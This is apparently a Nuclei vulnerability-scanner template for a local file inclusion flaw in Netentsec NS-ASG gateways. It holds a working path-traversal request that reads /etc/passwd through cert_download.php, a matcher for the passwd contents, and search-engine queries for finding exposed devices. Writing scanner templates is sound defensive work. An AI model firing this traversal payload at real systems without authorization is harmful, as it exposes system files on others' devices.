44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: nsasg-arbitrary-file-read
|
|
|
|
info:
|
|
name: NS ASG - Local File Inclusion
|
|
author: pikpikcu,ritikchaddha
|
|
severity: high
|
|
description: NS ASG is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://zhuanlan.zhihu.com/p/368054963
|
|
- http://wiki.xypbk.com/Web安全/网康%20NS-ASG安全网关/网康%20NS-ASG安全网关%20任意文件读取漏洞.md
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:h:netentsec:ns-asg:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
shodan-query: http.title:“NS-ASG”
|
|
fofa-query: app="网康科技-NS-ASG安全网关"
|
|
product: ns-asg
|
|
vendor: netentsec
|
|
tags: nsasg,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "$certfile"
|
|
- "application/pdf"
|
|
condition: and
|
|
# digest: 490a00463044022034be8f9fe6b5381b2cdf9158cbd2080507c9663b9bf856afb0a4408b25f210a8022047fcdc8c88e702e4e8736579d537b72c16451cbe4d7eafcdc3d9f6ebb119dcc2:922c64590222798bb761d5b6d8e72950 |